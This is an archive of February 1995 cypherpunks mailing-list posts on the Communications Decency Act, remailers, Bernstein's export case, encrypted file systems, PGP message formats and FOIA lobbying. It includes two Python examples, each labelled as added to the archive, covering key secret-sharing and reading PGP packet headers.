    Date: Wed, 8 Feb 1995 02:18:27 -0600 (CST)
    From: Samuel Kaplin <skaplin@mirage.skypoint.com>

    . . .

    >    (B) [makes a telephone call, whether or not conversation
    >    ensues, without disclosing his identity and with intent to
    >    annoy, abuse, threaten, or harass any person at the called
    >    number] makes a telephone call or utilizes a telecommunications
    >    device, whether or not conversation or communications ensues,
    >    without disclosing his identity with intent to annoy, abuse,
    >    threaten, or harass any person at the called number or who
    >    receives the communication;
    
    Ding...Ding...Ding... We have another winner. Goodbye remailers. Probably 
    90% of remailer traffic violates this one. Well boys and girls we'd 
    better get lots more offshore...soon.

Actually, unless the quote dropped important context, this part
doesn't seem to outlaw remailers, but rather certain classes of
remailer use (``makes a call'', ``utilizes...'').  It is the user, not
the provider that this seems to address.

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 10 Feb 95 09:58:29 PST
To: cypherpunks@toad.com
Subject: http://www.vocaltec.com/gti.html
Message-ID: <199502101758.MAA08815@ios.com>
MIME-Version: 1.0
Content-Type: text/plain


As seen on page B1 of today's WSJ:


> [Image]
> 
>               Talk over the Internet with your own voice.
>         Communicate with people from all over the world.
>           And all this with your existing Internet account.
> 
> Internet Phone (TM) is a unique software product that opens a new and
> exciting dimension for Internet users. With Internet Phone you can use
> the Internet to speak with any user all over the world! Yes, real-time
> voice conversations over the Internet, at the price of a local phone
> call or even less.
> 
> All you need is Internet Phone, a TCP\IP Internet connection and a
> Windows-compatible audio device. Plug in a microphone and speaker, run
> Internet Phone, and, by clicking a button, get in touch with Internet
> users all over the world. Whether you want to meet new friends, get
> information personally, or make the direct business contact, Internet
> Phone is for you. A friendly graphic user interface and a smart
> Voice-Activation feature make conversation a snap. VocalTec's
> sophisticated voice compression and voice transfer technology makes
> sure your voice gets across in a flash, using only a fraction of the
> available bandwidth.
> 
> Internet Phone always presents you with an updated list of topics and
> on-line users for you to choose. You can even set up Quick-Dial
> buttons which give you immediate access to frequently called users.
> Once you establish contact with a user, communication is carried out
> directly over the Internet.
> 
> [Image]
> 
> How can I order Internet Phone?
> 
> To be able to fully use Internet Phone over the Internet, you need a
> unique registration code. The Internet Phone software license can be
> purchased for only US$49! This is a special limited time offer (The
> standard retail price is $99). All you need to do is fill out and send
> us this order form, and we will supply you with the registration code.
> 
> You can even download the Internet Phone software and evaluate it for
> free! Without the registration code, you can use all of the Internet
> Phone features, but are limited to 90 seconds of speech. You have
> nothing to lose - check it out.
> 
> You can download your free evaluation copy of Internet Phone from
> ftp://ftp.vocaltec.com/iphone.zip.
> 
> For business and power users, VocalTec offers the Internet Phone Kit.
> The Internet Phone Kit includes, in addition to the Internet Phone
> software, unique hardware that improves sound quality and dramatically
> reduces bandwidth consumption.
> 
> Internet Phone System Requirements:
> 
>      486SX PC - 25 MHZ, 8MB RAM (recommended)
> 
>      WinSock 1.1
> 
>      An Internet TCP\IP connection (minimum connection: a modem
>      SLIP\PPP connection of 14,400 baud)
> 
>      Windows 3.1
> 
>      Windows-compatible audio device
> 
> SEE ALSO:
> 
> 
> [Image]  Ordering Internet Phone
> 
> [Image]  Internet Phone: Main Features
> 
> [Image]  Request More Information
> 
> [Image]  VocalTec Home Page
> 
> 
>     ------------------------------------------------------------------------
> 
> VocalTec Inc. * 157 Veterans Drive, Northvale, NJ 07647 * Tel:
> 201-768-9400 Fax: 201-768-8893 * info@vocaltec.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter F Cassidy <pcassidy@world.std.com>
Date: Fri, 10 Feb 95 10:16:28 PST
To: cypherpunks@toad.com
Subject: Bernstein! Where are YOU!
In-Reply-To: <199502101742.MAA05625@pipe3.pipeline.com>
Message-ID: <Pine.3.89.9502101309.A13216-0100000@world.std.com>
MIME-Version: 1.0
Content-Type: text/plain


Friends - and Bernstein,
-	I am a writer on assignment from the Economist writing about a 
certain cryptographer's tussle with the State Department, a fellow who is 
known around the beltway crypto-anarchy, privacy, 
niceness-on-the-Internet advocacy crowds as Bernstein. I have the outline 
of the case from the attorney's handling it. But my editors would really 
like to be able to name the party and sketch his background. All I have 
now is a last name, that he is a professor/and/or graduate student at UC 
Berkeley and is being roughed up by the State Department. Can anyone here 
- or the hero of the hour himself - come forward and help me complete my 
assignment?
-					Regards,
-						Peter Cassidy

-	PS: By the way, thanks to the guys who helped me shore up some 
basic concepts for the pieces I've done for OMNI and the Covert Action 
Quarterly that have touched on cryptography. Weirdly, one editor actually 
knew the fellow from Texas that I'd interviewed on technical points. 
(They worked together on a newspaper. What a ruck!)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 10:22:33 PST
To: Peter F Cassidy <pcassidy@world.std.com>
Subject: Re: Bernstein! Where are YOU!
In-Reply-To: <Pine.3.89.9502101309.A13216-0100000@world.std.com>
Message-ID: <9502101822.AA13995@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



I have never heard of such an individual, and I strongly suspect I
would have heard of them. I believe you have the name and details
wrong if the individual you are looking for exists at all.

Perry

Peter F Cassidy says:
> Friends - and Bernstein,
> -	I am a writer on assignment from the Economist writing about a 
> certain cryptographer's tussle with the State Department, a fellow who is 
> known around the beltway crypto-anarchy, privacy, 
> niceness-on-the-Internet advocacy crowds as Bernstein. I have the outline 
> of the case from the attorney's handling it. But my editors would really 
> like to be able to name the party and sketch his background. All I have 
> now is a last name, that he is a professor/and/or graduate student at UC 
> Berkeley and is being roughed up by the State Department. Can anyone here 
> - or the hero of the hour himself - come forward and help me complete my 
> assignment?
> -					Regards,
> -						Peter Cassidy
> 
> -	PS: By the way, thanks to the guys who helped me shore up some 
> basic concepts for the pieces I've done for OMNI and the Covert Action 
> Quarterly that have touched on cryptography. Weirdly, one editor actually 
> knew the fellow from Texas that I'd interviewed on technical points. 
> (They worked together on a newspaper. What a ruck!)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Fri, 10 Feb 95 13:33:34 PST
To: cypherpunks@toad.com
Subject: law vs technology
Message-ID: <199502102133.AA16472@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Recently there's been a great deal of discussion on this list
about upcoming legislation (HR666 S314 etc.).  Maybe it's time
to step back a little and look at the bigger picture.  I've
been assuming (perhaps incorrectly) for some time that most
cypherpunks hold a belief somewhat like the following:

There has never been a government that didn't sooner or later
try to reduce the freedom of its subjects and gain more control
over them, and there probably never will be one.  Therefore,
instead of trying to convince our current government not to
try, we'll develop the technology (e.g., remailers and ecash)
that will make it impossible for the government to succeed.
Efforts to influence the government (e.g., lobbying and
propaganda) are important only in so far as to delay its
attempted crackdown long enough for the technology to mature
and come into wide use.

But even if you do not believe the above is true, think about
it this way:  If you have a certain amount of time to spend on
advancing the cause of greater personal privacy (or freedom, or
cryptoanarchy, or whatever), can you do it better by using the
time to learn about cryptography and develop the tools to
protect privacy, or by convincing your government not to invade
your privacy?  I argue that since there are many more people
doing the former (EFF, CPSR, etc) than latter, that you'd be
more effective if you spent the time on the former.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzvayTl0sXKgdnV5AQEBvAP+MqsGer5pg2xM6+pYG7DgCSttUyAoG8I6
Hm/atFUdRauZ1WREpi3XTXEmNgT9m+QuON5+6rnUrfkizAdjr9EPFnXxMa8am8TZ
W7iQBuKb/KktbClbQyKzndeAOQ3oIOi4ahdn5eseOCWc3wX/WcjR6w9WJ6yPWoTJ
6fcglCGgo/8=
=Pc1V
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Fri, 10 Feb 95 14:59:11 PST
To: cypherpunks@toad.com
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.3.89.9502081213.A7848-0100000@netcom10>
Message-ID: <qAxElKJXYb$E078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <Pine.3.89.9502081213.A7848-0100000@netcom10>,
"James A. Donald" <jamesd@netcom.com> wrote:
>  (B) by striking out `makes any comment, request,
>         suggestion, or proposal' in subparagraph (A) and inserting
>         `makes, transmits, or otherwise makes available any comment, request,
>                 ^^^^^^^^^^
>          suggestion, proposal, image, or other communication'; 
> 
> This appears to make ISPs responsible for content.
> 
> It makes them responsible for something that they cannot 
> control without violating people's privacy.

Plus the processing cost would place a tremendous burden on the 'net.
Transmission goes both ways, not just from the posting machine to the
rest of the world.  Every site 'transmits' every piece of news posted
to the newsgroups they carry.  Every intermediate site, especially
the backbones, 'transmits' email even if not generated from or
addressed to that site.

--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 10 Feb 95 10:36:41 PST
To: lethin@ai.mit.edu (Rich Lethin)
Subject: Re: Global Filesystem Guild
In-Reply-To: <9502101722.AA04330@grape-nuts>
Message-ID: <199502101839.NAA24397@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>To reduce the vulnerability of a single user/BBS to having their files
>confiscated/stolen, could a distributed WAN filesystem be implemented with
>k-redundancy, e.g. the files wouldn't disappear until k servers (located in
>various unknown or inaccessible places) failed?  The price of storage would
>vary with the level of redundancy desired.  For security the servers would
>only store cyphertext, etc.  Local cacheing to reduce network load.
>

You've brought up three separate issues - fault-tolerance, secrecy and
secret sharing.  They are probably best dealt with separately, for the
purposes of understanding them as well as implementing them.

There are replicating file systems that provide the kind of fault
tolerance that you seem to be looking for, although I'm not aware
of any "production grade" systems that can replicate read-write
files in any reasonable way.  Done right, such a system would
probably involve guarantees, implemented partially at the server
side, that a file has been replicated in some number of places
prior to any write operation returning.  You could kludge this at
the client side alone by just modifying your file system interface
to make an appropriate number of replicas each time something is
written.  There are a whole bunch of issues surrounding failure
semantics - how do you handle writes when one of the replica servers
is unavailable, and so on.

Secrecy, on the other hand, is best thought of as a client-side
issue, and can be handled with existing client file system encryption
tools that run at the client file system interface level.  For
example, on Unix clients, CFS can store its underlying data on most
any remote file system, and requires no changes or special attention
from the server side.  I have no idea whether the various PC
encrypting file systems (SFS, etc) that have since come along
separate their functions from the low-level storage in a way that
makes it possible to use them with remote file servers, but there's
probably no reason you couldn't build such a system if one didn't
already exist.  The main issue in practice is key management.
Depending on the application, you might want to back up keys under
some secret sharing scheme that allows keys to be recovered by some
subset of key holders.  This is especially important for commercial
applications.

-matt
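
The key backup described above, worked as an added example (not code from
the post): a file-system key is split so that any k of n key holders can
rebuild it.  Shamir's polynomial scheme is an assumption chosen here, since
the post names no particular scheme; the function names and the fingerprint
check are illustrative.

```python
"""k-of-n backup of a file-encryption key with Shamir secret sharing (added example)."""
import hashlib
import secrets

# 2**521 - 1 is a Mersenne prime; a 256-bit key fits in one field element.
PRIME = 2**521 - 1


def key_fingerprint(key: bytes) -> str:
    """Short public check value so a rebuilt key can be validated before use."""
    return hashlib.sha256(key).hexdigest()[:16]


def _eval_poly(coeffs, x):
    """Horner evaluation mod PRIME; coeffs[0] is the constant term (the secret)."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % PRIME
    return acc


def split_key(key: bytes, k: int, n: int):
    """Return n shares (x, y); any k of them determine the key, k-1 reveal nothing."""
    if not 1 < k <= n:
        raise ValueError("need 1 < k <= n")
    secret = int.from_bytes(key, "big")
    if secret >= PRIME:
        raise ValueError("key does not fit in the field")
    # Random polynomial of degree k-1 whose value at x=0 is the secret.
    coeffs = [secret] + [secrets.randbelow(PRIME) for _ in range(k - 1)]
    return [(x, _eval_poly(coeffs, x)) for x in range(1, n + 1)]


def recover_int(shares):
    """Lagrange interpolation at x=0 over the shares supplied."""
    xs = [x for x, _ in shares]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share index")
    secret = 0
    for xi, yi in shares:
        num = den = 1
        for xj in xs:
            if xj != xi:
                num = num * -xj % PRIME
                den = den * (xi - xj) % PRIME
        secret = (secret + yi * num * pow(den, -1, PRIME)) % PRIME
    return secret


def recover_key(shares, key_len: int, fingerprint: str = None) -> bytes:
    """Rebuild the key; too few or corrupted shares raise ValueError.

    Interpolation itself always yields *some* number, so the length bound and
    the optional fingerprint are what catch a bad reconstruction.
    """
    value = recover_int(shares)
    if value >= 1 << (8 * key_len):
        raise ValueError("shares do not reconstruct a key of this length")
    key = value.to_bytes(key_len, "big")
    if fingerprint is not None and key_fingerprint(key) != fingerprint:
        raise ValueError("reconstructed key fails fingerprint check")
    return key


if __name__ == "__main__":
    fs_key = secrets.token_bytes(32)          # stand-in for a file-system key
    fp = key_fingerprint(fs_key)
    shares = split_key(fs_key, k=3, n=5)      # five key holders, any three suffice
    assert recover_key(shares[1:4], 32, fp) == fs_key
    print("recovered from holders", [x for x, _ in shares[1:4]])
    try:
        recover_key(shares[:2], 32, fp)
    except ValueError as err:
        print("two holders alone:", err)
```

Losing up to n-k shares costs nothing, which is the fault-tolerance half of
the question; holding fewer than k shares gives no information about the
key, which is the secrecy half.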




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 11:48:45 PST
To: Peter F Cassidy <pcassidy@world.std.com>
Subject: Re: Bernstein! Where are YOU!
In-Reply-To: <Pine.3.89.9502101309.A13216-0100000@world.std.com>
Message-ID: <9502101846.AA14694@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Actually, it is possible that you are talking about Dan Bernstein
(djb@silverton.berkeley.edu), but to my knowledge he hasn't had any
criminal problems with the state department. He's just requested some
export licenses that have been refused.

Perry

Peter F Cassidy says:
> Friends - and Bernstein,
> -	I am a writer on assignment from the Economist writing about a 
> certain cryptographers' tussle with the State Department, a fellow who is 
> known around the beltway crypto-anarchy, privacy, 
> niceness-on-the-Internet advocacy crowds as Bernstein. I have the outline 
> of the case from the attorneys handling it. But my editors would really 
> like to be able to name the party and sketch his background. All I have 
> now is a last name, that he is a professor/and/or graduate student at UC 
> Berkeley and is being roughed up by the State Department. Can anyone here 
> - or the hero of the hour himself - come forward and help me complete my 
> assignment?
> -					Regards,
> -						Peter Cassidy
> 
> -	PS: By the way, thanks to the guys who helped me shore up some 
> basic concepts for the pieces I've done for OMNI and the Covert Action 
> Quarterly that have touched on cryptography. Weirdly, one editor actually 
> knew the fellow from Texas that I'd interviewed on technical points. 
> (They worked together on a newspaper. What a ruck!)
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Fri, 10 Feb 95 11:08:17 PST
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: The question is moot: (Was: Not crypto, but scary.)
In-Reply-To: <Pine.SUN.3.91.950210010704.5527A-100000@access3.digex.net>
Message-ID: <Pine.SUN.3.91.950210135809.26929B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Feb 1995, Black Unicorn wrote:

[about HR 666]

> The bill is really just a restatement.  This has been the state of the 
> law for 11 years now.

Right - it is time to change the law.  HR 666 won't help in that direction.


-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 14:05:41 PST
To: cypherpunks@toad.com
Subject: Re: MIME based remailing commands
In-Reply-To: <9502102057.AA11903@cfdevx1.lehman.com>
Message-ID: <199502102205.OAA04014@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Rick Busdiecker <rfb@lehman.com> writes:
>Could one of the MIME supporters (I guess that would be `most
>everybody') explain why anything more than a To: header and an
>encrypted block is desireable for the in-the-clear message?

For one thing, you might want to know that you have an encrypted
message on your hands and not just somebody's misfired GIF.  For
another, you might want to know where the encrypted block begins and
where it ends.  You might also want to have information about what
kind of encoding has been done on the output of the encryption (base64,
uuencode, leave it as pure 8-bit binary, etc.)  And you might want to
have information about what kind of encryption was used, what key
was used, etc., in case you are supporting multiple encryption
formats and keys.

PGP, FYI, does include most of this information in the clear, albeit some
in binary format.

This information is generally needed for the receiver to successfully
decode and receive the message, so it does have to be in the clear.  Now,
there may be some circumstances where this is not desired, and where you
really do just want to hand the receiver a block of apparently random
data, with no indications whatsoever what it is.  Then by some
out-of-band means you have to have arranged with the receiver that he
will know exactly what transformation to do to get back the original
data.  For that I suppose you could just use text/plain (or something
like application/data?), and it looks as opaque as could be desired.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLzvjARnMLJtOy9MBAQFxigIAyzjDVvkgb85h2gbEMqAjuATlNGo1V1u0
YQdlJannRuUX+p0kXepHJ7101ROKFUjPwCjGZXNFFmvWvGz7tByoMw==
=aj4b
-----END PGP SIGNATURE-----
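
Added example, not part of the original post: a reader for the fields a
PGP 2.x message leaves in the clear, namely the recipient or signer key ID
and the algorithms, which is the binary information the post refers to.  It
assumes the old-format packet layout later documented in RFC 1991; the
sample packets are constructed and all function names are illustrative.

```python
"""What a PGP 2.x message reveals to someone holding no key at all (added example)."""
import base64
import struct

PK_ALGOS = {1: "RSA"}
HASH_ALGOS = {1: "MD5"}
ARMOR_STARTS = ("-----BEGIN PGP MESSAGE-----", "-----BEGIN PGP SIGNATURE-----")


def armor(data, label="MESSAGE"):
    """Wrap packets in ASCII armor (CRC-24 line omitted; dearmor() does not need it)."""
    b64 = base64.b64encode(data).decode("ascii")
    return (f"-----BEGIN PGP {label}-----\nVersion: 2.6\n\n"
            f"{b64}\n-----END PGP {label}-----\n")


def dearmor(text):
    """Return the binary packets of the first armored message or signature."""
    lines = [ln.strip() for ln in text.splitlines()]
    try:
        start = next(i for i, ln in enumerate(lines) if ln in ARMOR_STARTS)
        end = next(i for i in range(start + 1, len(lines))
                   if lines[i].startswith("-----END PGP "))
    except StopIteration:
        raise ValueError("no complete armor block") from None
    body = lines[start + 1:end]
    if "" in body:                       # armor headers stop at the first blank line
        body = body[body.index("") + 1:]
    # A line starting with "=" is the armor checksum, not data.
    return base64.b64decode("".join(ln for ln in body if not ln.startswith("=")))


def read_packet(data, pos=0):
    """Parse one old-format packet header; return (tag, body, next_pos)."""
    if pos >= len(data):
        raise ValueError("no packet data")
    ctb = data[pos]
    if not ctb & 0x80 or ctb & 0x40:
        raise ValueError("not an old-format PGP packet")
    tag, len_type = (ctb >> 2) & 0x0F, ctb & 0x03
    if len_type == 3:
        raise ValueError("indeterminate-length packet not handled")
    n = 1 << len_type                    # 1, 2 or 4 length octets
    length = int.from_bytes(data[pos + 1:pos + 1 + n], "big")
    start = pos + 1 + n
    if start + length > len(data):
        raise ValueError("truncated packet")
    return tag, data[start:start + length], start + length


def clear_fields(data):
    """Fields any observer can read from the first packet, without decrypting."""
    tag, body, _ = read_packet(data)
    if tag == 1 and len(body) >= 10:     # public-key encrypted session key
        key_id = body[1:9].hex().upper()
        return {"kind": "encrypted-to", "key_id": key_id, "short_id": key_id[-8:],
                "pk_algo": PK_ALGOS.get(body[9], body[9])}
    if tag == 2 and len(body) >= 19 and body[0] == 3:   # version 3 signature
        key_id = body[7:15].hex().upper()
        return {"kind": "signed-by", "key_id": key_id, "short_id": key_id[-8:],
                "created": int.from_bytes(body[3:7], "big"),
                "pk_algo": PK_ALGOS.get(body[15], body[15]),
                "hash_algo": HASH_ALGOS.get(body[16], body[16])}
    return {"kind": "other", "tag": tag}


def sample_packets():
    """Constructed test data: neither real ciphertext nor a real signature."""
    key_id = bytes.fromhex("0123456789ABCDEF")
    mpi = struct.pack(">H", 16) + b"\xaa\xbb"           # 16-bit dummy integer
    pkesk = bytes([2]) + key_id + bytes([1]) + mpi
    sig = (bytes([3, 5, 0x01]) + struct.pack(">I", 792453941) + key_id
           + bytes([1, 1]) + b"\x12\x34" + mpi)
    return bytes([0x84, len(pkesk)]) + pkesk, bytes([0x88, len(sig)]) + sig


if __name__ == "__main__":
    enc, sig = sample_packets()
    print(clear_fields(dearmor(armor(enc))))
    print(clear_fields(dearmor(armor(sig, "SIGNATURE"))))
    try:
        dearmor("c29tZSBvcGFxdWUgYmxvYg==\n")           # unlabelled blob
    except ValueError as err:
        print("opaque body:", err)
```

The unlabelled blob at the end is the other case in the post: nothing tells
the receiver where the data starts or how to decode it, so that has to be
agreed out of band.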




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Fri, 10 Feb 95 14:59:09 PST
To: cypherpunks@toad.com
Subject: Re: S. 314 and existing situation
In-Reply-To: <Pine.LNX.3.91.950209140130.8757A-100000@chewy.wookie.net>
Message-ID: <AbxElKJXYzk0078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <Pine.LNX.3.91.950209140130.8757A-100000@chewy.wookie.net>,
slowdog <slowdog@wookie.net> wrote:
> 
> Hard to tell from this bill what the deal is on this. Common carriers 
> aren't completely immune from prosecution or lawsuit or whatnot to begin 
> with. But in addition, S.314 introduces "transmit or otherwise make 
> available" into the language of the law. Which makes the -carrier- of the 
> "offending" information responsible.

Interesting point, there.

Following from that:

        Telecoms have bucks.
        Telecoms have lawyers.
        Telecoms are the 'transmission' agents for pretty much all of
                the internet. Even high speed dedicated T1s are usually
                from a telecom or two.

Can we get them involved?

--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Know your Constitution (void where prohibited)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Fri, 10 Feb 95 14:10:42 PST
To: cypherpunks@toad.com
Subject: Laws, Feds, & the Internet
Message-ID: <199502102211.OAA22129@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



The following was in today's San Francisco Chronicle.  BTW, quoting 
the entire article as I have done is probably a violation of "fair 
use" - but de minimis ...

All under *current* law, folks.

[hmmm -- encryption doesn't do much for exhibitionists and 
braggarts, does it?  ;-]

==============================

MAN JAILED FOR INTERNET MESSAGES

Associated Press

Detroit

	A college student was charged yesterday with posting computer 
messages describing the imaginary binding, rape, torture and murder 
of a woman who used to be in his Japanese class.

	"Torture is foreplay, rape is romance, snuff (killing) is climax," 
prosecutors say one of Jake Baker's messages read.

	The student, 20, was charged with the federal crime of transmitting a 
threat to injure.  He was jailed pending a bond hearing today.

	Baker, who was suspended from the University of Michigan last week,
told reporters he was within his rights to post the messages on the
Internet.  By posting the messages, he gave other Internet users
access to them.

	If convicted, Baker could be sentenced to up to five years in 
prison.  The name of the woman was not released.

==================================

===================================
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...
====================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hendrix@acs.bu.edu
Date: Fri, 10 Feb 95 11:39:10 PST
To: cypherpunks@toad.com
Subject: Re: HR830 - Anyone tracking this?
Message-ID: <199502101934.OAA62015@acs-mail.bu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
>The recent version of the EFFector Online had some information about the
>House of Representative's Bill HR830.  They say that this bill is being
>rammed through Congress and would cripple FOIA.  It would seemingly 
>change any public information that is given value to non-public
>information.  Does anyone have any further information?  
> 
>Mike 
>
In response to your post I am passing on some info that came my way on 
Tuesday, please excuse the length. Apart from the message below there is a 
letter written by James Love of TAP to Honorable William Clinger, Jr. the 
Chairman of the Committee on Government Reform and Oversight, but due to 
its length I have not included it here. I can E-mail it to anyone who is 
interested. 

                                Julian Burke



------- Forwarded Message Follows -------

Date sent:      Tue, 7 Feb 1995 02:45:55 -0800
Send reply to:  love@Essential.ORG
From:           James Love <love@Essential.ORG>
To:             Multiple recipients of list <law-lib@ucdavis.edu>
Subject:        Help! West Publishing seeks broad change in FOIA (fwd)
Originally to:  law librarians <law-lib@ucdavis.edu>,


Distributed to TAP-INFO, a free Internet Distribution List
(subscription requests to listproc@tap.org) 

TAXPAYER ASSETS PROJECT - INFORMATION POLICY NOTE
CROWN JEWELS CAMPAIGN - Juris, Legal Information
February 7, 1995

We need help from everyone!!!!!!!!  Please distribute this
widely.  jamie love   (love@tap.org, 610/658-0880 or 202/387-
8030)


-    Hearings set for today (Tuesday February 7) on bill
     containing special interest provision for West Publishing. 
     Hearings will be held before the subcommittee on "Regulatory
     Affairs."

-    House Republicans have slated quick action on the bill. 
     Subcommittee Mark-up is set for Thursday and full committee
     mark-up is set for Friday.  (Telephone and Fax numbers of
     committee members given below)

-    House Republicans introduce legislation with a section
     requested by West Publishing that will provide sweeping
     changes in federal freedom of information act, and prevent
     federal agencies from creating a public database that uses
     the West Publishing page numbers to reference case law.

-    The "West Provision" would also end its lawsuit with Tax
     Analyst, a Virginia publisher, who is seeking access to the
     Department of Justice JURIS database of court decisions in
     order to put the information into the public domain.  Tax
     Analysts alleges the JURIS database of court decisions are
     subject to FOIA and not protected by copyright.  A victory
     by Tax Analysts in this case will lead to a public domain
     database of federal court decisions.

-    The West Provision in the legislation would extend far
     beyond West Publishing's struggle to maintain its grip on
     the market for legal information.  It would exclude all
     contractor generated records from the federal Freedom of
     Information Act.  Examples of databases that would be
     affected by provision would be the SEC's EDGAR database and
     the Department of Education ERIC database.

-    Help needed in removing this special interest provision. 
     Telephone and fax numbers for the Subcommittee on Regulatory
     Affairs are given below.

>From best we can determine, the so called "Paperwork Reduction
Act" bill was introduced late yesterday or will be introduced
early today.  We do not have a bill number yet.  There will be a
hearing today (Tuesday February 7) before the "Subcommittee on
National Economic Growth, Natural Resources, and Regulatory
Affairs," more commonly referred to as the subcommittee on
"Regulatory Affairs."  Subcommittee Mark-up is set for Thursday
and full committee (the apparently misnamed Committee on
Government Reform and Oversight) mark-up is set for Friday.

A provision in this bill [Section 3518 (f) of the "Chairman's
Mark"] would do the following.

     If any person "adds value" to public information, the
     federal government would not have "any right to obtain,
     collect, acquire, disseminate, use or convert," the
     data, database or information product, or "any method
     used by the person to identify such resulting data,
     databases or information product," except "under terms
     that are expressly agreed to by such person."

This provision is being sold as a simple restatement of the law,
but that is far from true (or more bluntly, a lie).  The
provision in the bill is so broad that it covers all contractor
performed work on behalf of agencies, and effectively exempts
contractor generated records from the federal Freedom of
Information Act (FOIA).  For example, since LEXIS "adds value" to
the EDGAR database by taking the incoming filings from the
government and putting them in a database, even if the government
had a copy of the database, it could not disseminate the records
without the consent of LEXIS.  Likewise, many databases, such as
the Department of Education ERIC database, are largely put
together by private contractors.  Indeed, if Oliver North had used
a private contractor for the White House email system, those
records would appear to be off limits to both FOIA and a
government subpoena.  Moreover, the provision would apply even in
cases where the firm did not have a copyright or any other
protectable intellectual property right, a huge change in
federal law.

The provision would specifically apply to an active federal
lawsuit between West Publishing and Tax Analysts, over the
Department of Justice JURIS database.  West Publishing was a
contractor on JURIS, an online system run by the Department of
Justice, which contains several decades of federal court
decisions.  West Publishing is trying to prevent Tax Analysts
from obtaining copies of court decisions contained in the
government's JURIS database.  Tax Analyst believes the records
are subject to FOIA, and not protected by copyright.  If Tax
Analysts (fmi, Tom Field, 703/533-4400 or Eleanor Lewis 301/652-
3453) wins the law suit, which has been very expensive, it plans
to put the data into the public domain, creating a public
database of federal court decisions -- something that West
Publishing is fighting against.  Moreover, the West assertion of
its copyright of legal citations is being challenged in federal
court in New York by Hyperlaw, a small CD-ROM publisher (fmi,
Alan Sugarman, President, 212/877-1371, sugarman@panix.com).  If
Sugarman wins his case, the West provision would prevent the
Department of Justice from using the West citations in a public
database.


---------------------------------------------------------------------
TAP-INFO is an Internet Distribution List provided by the Taxpayer
Assets Project (TAP).  TAP was founded by Ralph Nader to monitor the
management of government property, including information systems and
data, government funded R&D, spectrum allocation and other government
assets.  TAP-INFO reports on TAP activities relating to federal
information policy.  tap-info is archived at essential.org
and cpsr.org.

Subscription requests to tap-info to listproc@tap.org with
the message:  subscribe tap-info your name
---------------------------------------------------------------------
Taxpayer Assets Project; P.O. Box 19367, Washington, DC  20036
v. 202/387-8030; f. 202/234-5176; internet:  tap@tap.org
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 10 Feb 95 12:42:13 PST
To: cypherpunks@toad.com
Subject: Re: West (was:HR830 - Anyone tracking this?)
Message-ID: <9502102042.AA20803@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>-    House republicans introduce legislation with a section
>     requested by West Publishing that will provide sweeping
>     changes in federal freedom of information act, and prevent
>     federal agencies from creating a public database that use
>     the West Publishing page numbers to reference case law.

Well, the West citation system *is* proprietary, without a doubt.
This is a case where ease-of-use has completely dominated. Court
records are completely laced with West citations.

>-    The "West Provision" would also end its lawsuit with Tax
